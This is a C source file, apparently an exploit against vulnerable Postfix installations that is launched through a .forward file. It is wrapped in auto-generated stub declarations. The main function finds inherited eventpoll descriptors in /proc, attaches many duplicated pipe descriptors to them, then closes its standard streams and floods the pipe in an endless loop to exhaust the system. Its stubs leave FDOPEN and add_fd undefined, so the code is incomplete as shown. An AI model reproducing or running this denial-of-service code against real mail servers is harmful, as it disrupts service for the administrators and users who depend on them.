
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct dirent {char* d_name; } ;
typedef int DIR ;


 int FDOPEN ;
 int add_fd (int ,int) ;
 int atoi (char*) ;
 int close (int) ;
 int closedir (int *) ;
 int dup (int) ;
 int exit (int ) ;
 int fflush (int ) ;
 int getpid () ;
 int memset (char*,int ,int) ;
 int * opendir (char*) ;
 int pipe (int*) ;
 int printf (char*,...) ;
 int read (int,char*,int) ;
 struct dirent* readdir (int *) ;
 int readlink (char*,char*,int) ;
 int sprintf (char*,char*,...) ;
 int stdout ;
 scalar_t__ strstr (char*,char*) ;
 int write (int,char*,int) ;

int main(int argc, char *argv[]) {

 int fds[2];
 char dir[32], c;
 int i, found = 0;

 pipe(fds);
 sprintf(dir, "/proc/%d/fd", getpid());
 printf("[*] Opening directory %s\n", dir);
 DIR *fd_dir = opendir(dir);
 struct dirent *de = readdir(fd_dir);


 while (de != ((void*)0)) {
  char link_d[256];
  char link_f[256];
  memset(link_d, 0, 256);
  sprintf(link_f, "%s/%s", dir, de->d_name);
  readlink(link_f, link_d, 256);
  if ( strstr(link_d, "eventpoll") ) {
   found = 1;
   printf(" => %s points to %s\n", de->d_name, link_d);
   add_fd(atoi(de->d_name), fds[0]);

   for (i = 0; i<FDOPEN; i++)
    add_fd(atoi(de->d_name),dup(fds[0]));
  }
  de = readdir(fd_dir);
 }
 closedir(fd_dir);

 if (found == 0) {
  printf("[!] Are you sure that your postfix is vulnerable?\n");
  printf("[!] Are you launching me throw a .forward file?\n");
  exit(0);
 }

 printf("[*] Starting to flood the system!\n");
 fflush(stdout);
 close(0);
 close(1);
 close(2);


 while (1) {
  write(fds[1], "A",1);
  read(fds[0],&c, 1);
 }

 return 0;
}
